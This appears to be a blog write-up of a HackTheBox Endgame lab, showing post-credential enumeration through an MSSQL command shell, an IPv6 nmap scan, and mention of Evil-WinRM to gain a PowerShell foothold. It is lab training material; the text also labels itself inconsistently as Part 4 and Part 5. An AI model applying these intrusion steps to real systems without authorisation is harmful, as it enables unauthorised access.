by HackTheBox P.O.O Writeup Series:
- PART 1: HackTheBox Endgame P.O.O Writeup Part 1 – Recon (Flag 01/05)
- PART 2: HackTheBox Endgame P.O.O Writeup Part 2 – Huh?! (Flag 02/05)
- PART 3: HackTheBox Endgame P.O.O Writeup Part 3 – BackTrack (Flag 03/05)
- PART 4: HackTheBox Endgame P.O.O Writeup Part 4 – Foothold (Flag 04/05)
- PART 5: p00ned (Coming soon)
The 4th Flag of P.O.O was a bit complicated and time-consuming because I had no idea what to do, I tried Evil WinRM, DCSync, a lot of Impacket tools to gain foothold, all my efforts are in vain.
But as always a simple and straight to the point nudge from a good HTB fellow user made me understand what I supposed to try. I was going in a wrong direction. So here is the writeup of POO Part 5: Foothold.
As I already have Administrator credentials from my previous flag, I tried to log in as Administrator from the SQL Shell python script, I was able to login successfully and get the shell – but the Administrator is a public user with limited access.
I ran couple of commands to find users in the box, Administrator privilages etc.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 |
# root @ ns09 in ~/htb/poo [14:52:36] $ python SQL-Explt.py Successful login: intranet.poo\Administrator@10.13.38.11 CMD MSSQL$POO_PUBLIC@COMPATIBILITY C:\WINDOWS\system32> net user Administrator User name Administrator Full Name Comment Built-in account for administering the computer/domain User's comment Country/region code 000 (System Default) Account active Yes Account expires Never Password last set 4/4/2018 11:27:10 AM Password expires Never Password changeable 4/5/2018 11:27:10 AM Password required Yes User may change password Yes Workstations allowed All Logon script User profile Home directory Last logon 3/6/2020 1:52:59 PM Logon hours allowed All Local Group Memberships *Administrators Global Group memberships *None The command completed successfully. CMD MSSQL$POO_PUBLIC@COMPATIBILITY C:\WINDOWS\system32> whoami /all USER INFORMATION ---------------- User Name SID =========================== ============================================================= nt service\mssql$poo_public S-1-5-80-4078066653-3512796471-551061035-3947311196-544738325 GROUP INFORMATION ----------------- Group Name Type SID Attributes ==================================== ================ ============ ================================================== Mandatory Label\High Mandatory Level Label S-1-16-12288 Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group BUILTIN\Performance Monitor Users Alias S-1-5-32-558 Mandatory group, Enabled by default, Enabled group BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group NT SERVICE\ALL SERVICES Well-known group S-1-5-80-0 Mandatory group, Enabled by default, Enabled group PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ========================================= ======== SeAssignPrimaryTokenPrivilege Replace a process level token Disabled SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled USER CLAIMS INFORMATION ----------------------- User claims unknown. Kerberos support for Dynamic Access Control on this device has been disabled. CMD MSSQL$POO_PUBLIC@COMPATIBILITY C:\WINDOWS\system32> net users User accounts for \\COMPATIBILITY ------------------------------------------------------------------------------- Administrator DefaultAccount doobie doobie2 Guest POO_PUBLIC00 POO_PUBLIC01 POO_PUBLIC02 POO_PUBLIC03 POO_PUBLIC04 POO_PUBLIC05 POO_PUBLIC06 POO_PUBLIC07 POO_PUBLIC08 POO_PUBLIC09 POO_PUBLIC10 POO_PUBLIC11 POO_PUBLIC12 POO_PUBLIC13 POO_PUBLIC14 POO_PUBLIC15 POO_PUBLIC16 POO_PUBLIC17 POO_PUBLIC18 POO_PUBLIC19 POO_PUBLIC20 script WDAGUtilityAccount The command completed successfully. CMD MSSQL$POO_PUBLIC@COMPATIBILITY C:\WINDOWS\system32> |
At this moment, I’m again clue-less. The Administrator seemed useless for the first time. But, for my surprise, an unintended “ipconfig /all” showed me the machine’s network is configured with preferred IPv6 – dead:babe::1001. The DNS is pointing to “172.20.128.53”. I tried to ping Google DNS 8.8.8.8 it failed. My ping to 172.20.128.53 was successful.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 |
# root @ ns09 in ~/htb/poo [15:07:21] $ python SQL-Explt.py Successful login: intranet.poo\Administrator@10.13.38.11 CMD MSSQL$POO_PUBLIC@COMPATIBILITY C:\WINDOWS\system32> ipconfig /all Windows IP Configuration Host Name . . . . . . . . . . . . : COMPATIBILITY Primary Dns Suffix . . . . . . . : intranet.poo Node Type . . . . . . . . . . . . : Hybrid IP Routing Enabled. . . . . . . . : No WINS Proxy Enabled. . . . . . . . : No DNS Suffix Search List. . . . . . : intranet.poo Ethernet adapter Ethernet0: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : Intel(R) 82574L Gigabit Network Connection Physical Address. . . . . . . . . : 00-50-56-B9-76-07 DHCP Enabled. . . . . . . . . . . : No Autoconfiguration Enabled . . . . : Yes IPv6 Address. . . . . . . . . . . : dead:babe::1001(Preferred) Link-local IPv6 Address . . . . . : fe80::20ca:ccce:396f:dba1%11(Preferred) IPv4 Address. . . . . . . . . . . : 10.13.38.11(Preferred) Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : dead:babe::1 10.13.38.2 DNS Servers . . . . . . . . . . . : dead:babe::1 10.13.38.2 NetBIOS over Tcpip. . . . . . . . : Disabled Ethernet adapter Ethernet1: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : Intel(R) 82574L Gigabit Network Connection #2 Physical Address. . . . . . . . . : 00-50-56-B9-D9-FF DHCP Enabled. . . . . . . . . . . : No Autoconfiguration Enabled . . . . : Yes IPv4 Address. . . . . . . . . . . : 172.20.128.101(Preferred) Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : DNS Servers . . . . . . . . . . . : 172.20.128.53 NetBIOS over Tcpip. . . . . . . . : Disabled CMD MSSQL$POO_PUBLIC@COMPATIBILITY C:\WINDOWS\system32> |
So now I know the IPv6 of the machine I decided to scan the services or open ports.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 |
# root @ ns09 in ~ [15:29:04] $ nmap -6 -p- -T4 -A -v dead:babe::1001 Scanning dead:babe::1001 [65535 ports] Discovered open port 80/tcp on dead:babe::1001 Discovered open port 5985/tcp on dead:babe::1001 Discovered open port 1433/tcp on dead:babe::1001 Nmap scan report for dead:babe::1001 PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 | http-server-header: | Microsoft-HTTPAPI/2.0 |_ Microsoft-IIS/10.0 |_http-title: Bad Request 1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.2027.00; RTM+ | ms-sql-ntlm-info: | Target_Name: POO | NetBIOS_Domain_Name: POO | NetBIOS_Computer_Name: COMPATIBILITY | DNS_Domain_Name: intranet.poo | DNS_Computer_Name: COMPATIBILITY.intranet.poo | DNS_Tree_Name: intranet.poo |_ Product_Version: 10.0.17763 | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback | Issuer: commonName=SSL_Self_Signed_Fallback | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2020-02-25T19:31:30 | Not valid after: 2050-02-25T19:31:30 | MD5: 10bc d953 87a6 26e9 9eff 885a 4919 425d |_SHA-1: ac12 0344 6313 bbf4 502c 1984 56a7 deeb 3b9f 5320 |_ssl-date: 2020-03-06T12:35:23+00:00; +7s from scanner time. 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Bad Request No OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.80%E=6%D=3/6%OT=80%CT=%CU=%PV=N%DS=1%DC=D%G=Y%TM=5E624384%P=x8 OS:6_64-pc-linux-gnu)S1(P=600e3b750020067fXX{32}0050a7b8c45a6204d58a27fe80 OS:12ffff50ab0000020405390103030801010402%ST=0.07778%RT=0.272633)S2(P=6008 OS:06730020067fXX{32}0050a7b90af90be6d58a27ff8012ffff602900000204053901030 OS:30801010402%ST=0.178774%RT=0.347316)S3(P=60067b20001c067fXX{32}0050a7ba OS:bdad2deed58a28007012ffffa07100000204053901030308%ST=0.277737%RT=0.45156 OS:6)S4(P=600ffefb0020067fXX{32}0050a7bb0924a5fcd58a28018012ffffc7e3000002 OS:0405390103030801010402%ST=0.377846%RT=0.552361)S5(P=600d7a440020067fXX{ OS:32}0050a7bcd54f3488d58a28028012ffff6d2a0000020405390103030801010402%ST= OS:0.478352%RT=0.644463)S6(P=6007ef2c001c067fXX{32}0050a7bd5514f4b0d58a280 OS:37012fc9444b500000204053901010402%ST=0.578091%RT=0.748078)IE1(P=6000{4} OS:803a7fXX{32}81007f97abcd00{122}%ST=0.602311%RT=0.793024)TECN(P=602359ba OS:0020067fXX{32}0050a7becf3d00d5d58a28048052ffffa6ab000002040539010303080 OS:1010402%ST=0.807169%RT=0.980875)EXTRA(FL=12345) Network Distance: 1 hop Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 6s, deviation: 0s, median: 6s | ms-sql-info: | dead:babe::1001:1433: | Version: | name: Microsoft SQL Server 2017 RTM+ | number: 14.00.2027.00 | Product: Microsoft SQL Server 2017 | Service pack level: RTM | Post-SP patches applied: true |_ TCP port: 1433 TRACEROUTE HOP RTT ADDRESS 1 185.30 ms dead:babe::1001 Nmap done: 1 IP address (1 host up) scanned in 368.44 seconds Raw packets sent: 131344 (8.408MB) | Rcvd: 230 (14.704KB) # root @ ns09 in ~ [15:35:16] $ |
Well, well, well, I found what I was looking for. The WinRM is running on the port 5985. In the next step I updated my hosts file with newly found IPv6 and used Evil-WinRM to get PowerShell shell.
That’s all folks, Thanks for reading. See you soon with the last part “p00ned”.
[…] Previous Post Previous post: HackTheBox Endgame P.O.O Writeup Part 2 – Huh?! (Flag 02/05)Next Post Next post: HackTheBox Endgame P.O.O Writeup Part 4 – Foothold (Flag 04/05) […]
[…] HackTheBox Endgame P.O.O Writeup Part 4 – Foothold (Flag 04/05) […]
[…] HackTheBox Endgame P.O.O Writeup Part 4 – Foothold (Flag 04/05) […]